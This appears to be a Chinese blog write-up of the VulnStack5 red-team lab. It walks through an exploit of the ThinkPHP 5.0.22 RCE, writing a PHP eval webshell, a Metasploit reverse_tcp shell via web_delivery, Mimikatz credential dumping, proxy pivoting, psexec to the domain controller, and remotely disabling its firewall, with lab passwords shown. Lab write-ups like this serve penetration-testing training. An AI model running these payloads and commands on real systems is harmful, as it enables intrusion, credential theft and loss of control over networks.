红队靶场之VulnStack5红日安全,域横向,移动反弹sehll,thikphpV5.0的RCE漏洞

已于 2024-05-18 15:02:27 修改
阅读量794 收藏 34
点赞数 9
分类专栏: 红队靶场 文章标签: 笔记 安全 网络安全 系统安全 web安全
于 2024-05-16 12:25:49 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_58116751/article/details/138956036
版权

此次渗透测试我们使用了红日安全的VulnStack5靶场,靶场虚拟机共用两个,一个外网一个内网。

攻击端

kali:192.168.206.128

目标端

win7:

外网网卡:192.168.206.129 NAT模式,模拟外网

内网网卡:192.168.138.135 仅主机模式,模拟内网

账号信息:

sun\leo 123.com

sun\Administrator huawei@123

Server2008

IP:192.168.138.138 仅主机模式,模拟内网

账号信息:

sun\admin 2020.com

我们起手依旧显示扫描一手网段

Nmap -Pn 192.168.206.0/24

可发现目标服务开启了80,3306,3389端口,因为在渗透中web优先级较高我们先看80端口

可以发现是一个经典的ThinkPHP页面版本是5.0,通过报错测试发现详细版本v5.0.22

根据历史遗留漏洞来尝试渗透。判断他他大概率存在5.0著名的RCE漏洞

我们使用searchsploit thinkphp来查看漏洞

我们将46150下载到我们当前目录下并查看他

这边发现了v5.0.22有4个可利用的pyload经过构造测试发现最终pyload为http://192.168.206.129/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

最后测试成功发现网页的确存在RCE漏洞,那我们构造一个shell语句/?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo "<?php @eval($_POST[bqb]);?>" > shell.php

ok现在shell写进去了我们上蚁剑连接

中国蚁剑是一款开源的跨平台网站管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。是一款非常优秀的webshell管理工具。Github地址为:

GitHub - AntSwordProject/AntSword-Loader: AntSword 加载器

我们systeminfo查看他的一个系统信息,第一次查看无回显之后将蚁剑连接数据删除后再尝试就有回显了可能是一个蚁剑的小问题,多尝试就好了。

我们同通过win7相他的域内网进行横向移动

为了拿到更好的的权限和功能,需要一个shell进行操作,这里我们使用反弹shell方式来获取shell。Metasploit的Web Delivery Script是一个多功能模块,可在托管有效负载的攻击机器上创建服务器。当受害者连接到攻击服务器时,负载将在受害者机器上执行。此漏洞需要一种在受害机器上执行命令的方法。特别是你必须能够从受害者到达攻击机器。远程命令执行是使用此模块的攻击向量的一个很好的例子。Web Delivery脚本适用于php,python和基于PowerShell的应用程序。

进入msfconsole,然后选择对应的模块并设置好选项。

use exploit/multi/script/web_delivery

set target 2

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.206.129#自己ip地址

exploit

运行后会生成一段执行代码,将执行代码放到你的蚁剑终端上执行

等待一会,再用sessions查看会看到一条记录,我们用sessions制定连接上win7

我们查看当前权限并且提升到system权限上

getuid

setsystem

getuid

下面我们来尝试攻击域控。

1添加路由

首先使用background返回到msfconsole,然后添加一个通向192.168.138.0网段的路由:

route add 192.168.138.0 255.255.255.0 1 #这里的1代表session的id号

route print

我们使用msf自带的代理模块,来搭建一条代理通道

use auxiliary/server/socks_proxy

set srvport 1080

set srvhost 127.0.0.1

run

再kali上添加socks的代理文件 编辑/etc/proxychains.conf文件,将socks5服务器指向127.0.0.1的1080端口,之后便可以使用proxychains将我们的程序代理进内网了。

[ProxyList]

socks5 127.0.0.1 1080

现在我们可以用kali通过代理进入他的域了

我们可以使用proxychains nmap进行内网扫描了。接下来扫描域控192.168.138.138端口开放情况。

我们还是连接他的win7会话

使用msfconsole中得kiwi模块来抓取密码

load kiwi

kiwi_cmd privilege::debug

kiwi_cmd sekurlsa::logonPasswords

发现报错

因为当前是32位的进程无法运行mimikatz,所以我们需要将当前进程迁移到一个64位的进程中。执行ps命令后随便找一个64位的进程迁移即可。

先用ps查看一下然后转移到cmd.exe X64上

migrate 380#根据自己情况来

kiwi_cmd privilege::debug

kiwi_cmd sekurlsa::logonPasswords

获取到了win7域中存储的用户和密码

既然已经获得了域管理员的用户名密码,那么我们直接尝试使用psexec登录域控(Windows 2008)。

use exploit/windows/smb/psexec

set rhosts 192.168.138.138

set SMBDomain SUN

set SMBUser administrator

set SMBPass dc123.com

set payload windows/meterpreter/bind_tcp

run

失败了,应该是Windows 2008开启了防火墙的原因。没关系,既然有了域管理员的密码,我们可以尝试关闭Windows 2008的防火墙。我们用sc通过创建服务来远程执行。

接下来在Meterpreter中运行shell进入命令行模式,使用chcp 65001修改编码格式为utf8,要不显示的是乱码。再执行如下net use命令,让其与Windows 2008建立ipc$连接。

ipc$连接建立成功后,可使用net use进行查看

然后创建服务来远程关闭Windows 2008的防火墙:

sc \\192.168.138.138 create unablefirewall binpath= "netsh advfirewall set allprofiles state off" # 创建服务

sc \\192.168.138.138 start unablefirewall # 立即启动服务

此时再次尝试使用psexec登录域控,成功上线。

开启Windows 2008远程桌面:

use post/windows/manage/enable_rdp

set session 8

run

执行后,使用proxychains设置代理即可连接Windows 2008的远程桌面了:

proxychains rdesktop 192.168.138.138

比奇堡渗透扛把子
关注
  • 9
    点赞
  • 34
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
[红日安全]Web安全Day6 - 业务逻辑漏洞实战攻防
hongrisec的博客
02-29 848
本文由红日安全成员: Orion 编写,如有不当,还望斧正。 大家好,我们是红日安全-Web安全攻防小组。此项目是关于Web安全的系列文章分享,还包含一个HTB靶场供大家练习,我们给这个项目起了一个名字叫 Web安全实战 ,希望对想要学习Web安全的朋友们有所帮助。每一篇文章都是于基于漏洞简介-漏洞原理-漏洞危害-测试方法(手工测试,工具测试)-靶场测试(分为PHP靶场、JAVA靶场、Python...
红日靶场vulnstack5-完整渗透过程
信安是不可或缺的一部分!
10-20 2015
这个靶场还是比较简单使用cs很快就做完了,其中也发现有一些问题,像是cs插件的开机3389,试了很多次,最后找到原因很多的插件使用的是powershell开启的,但是低版本像2008没有这个,导致无法开启,后面使用注册表开启才行。
vulnstack(五)
干铮的博客
05-30 1147
1.信息收集 主机发现 sudo netdiscover eth0 -r 192.168.31.0/24 端口扫描 nmap -A 192.168.31.57 -p- -sV -oN nmap.a goby漏扫 2.漏洞利用 goby 通用poc写webshell echo ^<?php @eval($_POST['123']) ?^> > #注意”>“字符需要转义 type shell.php 蚁剑连接webshell 3.
红日安全ATT&CK靶机实战系列之vulnstack5
黑白的博客
04-25 5113
typora-root-url: pic 声明 好好学习,天天向上 环境配置 下载地址,直接进去用百度云,没有会员也下的非常快 http://vulnstack.qiyuanxuetang.net/vuln/detail/7/ 边下载着,可以开始vmware的网络配置 有两个网段,外网网段是我自己设置的桥接模式192.168.31.1/24,内网网段,vmware加一个网卡VMnet4,192.168.138.1/24 和前面的大同小异,我这里就不细说了看过系列文章的应该都已经很清楚这种网络结构了,我直.
vulnstack红队5
Jim2g
07-29 420
1:搭建好靶场 外网 192.168.135.0/24 内网 192.168.138.0/24 2:访问 win7 搭建的网站 3:扫描目录 4:访问下robots.txt 和add.php ,没有太大价值。尝试下暴力破解这个地方。 5:还真跑出来了,字典强大就是好啊 6:这还不简单直接上马getshell 7:上传木马,蚁剑连接 8:看下内网,发下还有一台主机 9:在基本信息里面存在名为sun.com 10:查看用户权限不够,算了直接搞内网吧 11:用cs生成木马传到主机并且运
vulnstack(五)-红日靶场复现
BuNahua的博客
09-04 3193
说明:关于该复现中的问题欢迎vx交流:Bestboysendit 目录: 一、靶场信息: 二、外网渗透: 方式一: 方式二: 三、内网进攻: 四、痕迹清理: 五、参考链接: 一、靶场信息: http://vulnstack.qiyuanxuetang.net/vuln/detail/7/ 此次靶场虚拟机共用两个,一个外网一个内网,用来练习红队相关内容和方向,主要包括常规信息收集、Web攻防、代码审计、漏洞利用、内网渗透以及渗透等相关内容学习,此靶场主要用来学习,请大家遵守网络网络安全法。 描述 虚拟机密码
内网之靶场VulnStack红队(五)
shy的博客
11-13 2221
环境搭建: 外网:192.168.135.0 内网:192.168.138.0 边界机器:win7 外网:192.168.135.150 内网:192.168.138.136 账号: heart 123.com #本地管理员用户 sun\Administrator dc123.com #管用户 内网机器:winserver 2008 内网:192.168.138.136 账号: sun\admin 2020.com #由于需要改密码,我更改为2020.com1...
红日靶机vulnstack05【半总结】
qq_45300786的博客
10-07 298
网络模式 win7 DC2008
ATT&CK 实战 - 红日安全 vulnstack (一)
洛柒尘的博客
08-20 4544
前言 1 | 环境搭建 | 1.0 | 靶场介绍 | ATT&CK实战系列—红队实战(一)是红日安全团队出品的一个实战环境,该靶场模拟真实环境。 1.0.0 | 靶场信息 | 靶场名: vulnstack 1 下载链接: http://vulnstack.qiyuanxuetang.net/vuln/detail/2/ 靶机数量: 3 1.0.1 | 虚拟机配置 | 所有主机密码为:hongrisec@2019 密码同一修改为:hongrisec@2021 攻击机 名称
红日安全 vulnstack (一)
最新发布
逍遥小哥的博客
12-01 241
我们这边整理一下,因为这是我们自己搭建的,所以我们物理机肯定和nat网是通的,但是真实情况是win7nat网是外网,所以不能直接用内网cs做服务器,要用公网做服务器,因为内网cs做服务器,外网是ping不通的内网的。我们现在的问题是没有办法直连这三台主机,因为这三台主机不出网,所以我们需要利用中转服务器做一个sock5代理。那么win7是通外网的,win2003和win2008是不通外网,但是与win7是互通的。大家好,这段时间在玩红日安全靶场,这个靶场质量非常高,推荐大家玩一玩。
2020年红日安全星火沙龙PPT.zip
02-25
2020年红日安全星火沙龙PPT
[红日安全]Web安全Day4 - SSRF实战攻防
hongrisec的博客
02-25 813
本文由红日安全成员: MisakiKata 编写,如有不当,还望斧正。 大家好,我们是红日安全-Web安全攻防小组。此项目是关于Web安全的系列文章分享,还包含一个HTB靶场供大家练习,我们给这个项目起了一个名字叫 Web安全实战 ,希望对想要学习Web安全的朋友们有所帮助。每一篇文章都是于基于漏洞简介-漏洞原理-漏洞危害-测试方法(手工测试,工具测试)-靶场测试(分为PHP靶场、JAVA靶场、P...
渗透靶场--vulnstack-红队评估实战(5)
weixin_45794666的博客
07-20 784
vulnstack-红队评估实战(5) 环境配置 win7 sun\heart 123.com sun\Administrator dc123.com 内网:192.168.138.136 外网:192.168.154.140 启动phpstudy 2008 sun\admin 2021.com 192.168.138.138 kali 192.168.154.129 1.对外网主机进行信息搜集 开放了80和3306,先访问80为thinkphp,通过错误页面得到版本信息5.0.22 搜索
红日安全vulnstack-ATT&CK实战系列 红队实战(一)
热门推荐
遇事不决冲冲冲
12-25 1万+
一.介绍 vulnstack官网下载地址,也是拿百度网盘下载的,这里也放一个链接提取码: i7xv 官方靶机说明: 红队实战系列,主要以真实企业环境为实例搭建一系列靶场,通过练习、视频教程、博客三位一体学习。另外本次实战完全模拟 ATT&CK攻击链路进行搭建,开成完整闭环。后续也会搭建真实 APT 实战环境,从实战中成长。虚拟机所有统一密码:hongrisec@2019 整体思路 信息收集发现yxcms框架的网页,通过漏洞利用get到shell,拿cs控制后进行内网信息收集以及横向移动,最终用窃
红日php代码审计,[红日安全]代码审计Day3 - 实例化任意对象漏洞
weixin_29454359的博客
03-26 441
本文由红日安全成员:七月火编写,如有不当,还望斧正。前言大家好,我们是红日安全-代码审计小组。最近我们小组正在做一个PHP代码审计的项目,供大家学习交流,我们给这个项目起了一个名字叫PHP-Audit-Labs。现在大家所看到的系列文章,属于项目第一阶段的内容,本阶段的内容题目均来自PHP SECURITY CALENDAR 2017。对于每一道题目,我们均给出对应的分析,并结合实际C...
vulnstack5靶场笔记
orange777
02-01 2405
红日靶场5
红日安全内网渗透笔记
VB551的博客
04-10 4540
靶场下载地址:漏洞详情 环境配置参考:【红日安全-VulnStack】ATT&CK实战系列——红队实战(二) - yokan - 博客园 此实战仅有3台机器 DMZ区的WEB机 、核心区的AD机、办公区的PC 第一步:信息收集 已知WEB机的IP地址,用syn包进行扫描。 nmap -sS -v 192.168.111.80 获得端口开放 ...
[红日安全]代码审计Day1 - in_array函数缺陷
大方子
09-06 817
============================== 个人收获: 1.在插入语句里面进行注入时,需要把前面valuesd的括号闭合 2.in_array第三个参数没有开启的时候,可以通过(7websell)在强转为整数型后就等于7进行绕过         ==================================     前言 大家好,我们是红日安全-代码...
ATT\\\\&CK红队评估实战靶场
08-16
ATT&CK红队评估实战靶场四是一个实战训练场景,其中使用了phpmyadmin来利用数据库日志写入马来获取会话。具体的方法和之前的红日靶场一类似,你可以去查看相关链接了解更多细节。在攻击机要访问52网段的资源时,可以使用session 4作为下一跳进行路由设置。可以通过routeprint命令查看路由表,并使用routeadd命令添加相应的路由。此外,可以通过将SSH公钥添加到/home/ubuntu/.ssh/authorized_keys文件来实现免密登录到目标机器。具体命令是将SSH公钥追加到该文件中。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [ATT&CK红队评估(红日靶场四)](https://blog.csdn.net/weixin_45682839/article/details/124485070)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 50%"] - *2* [ATT&CK红队评估实战靶场-1(全网最细)](https://blog.csdn.net/qq_40638006/article/details/122033546)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值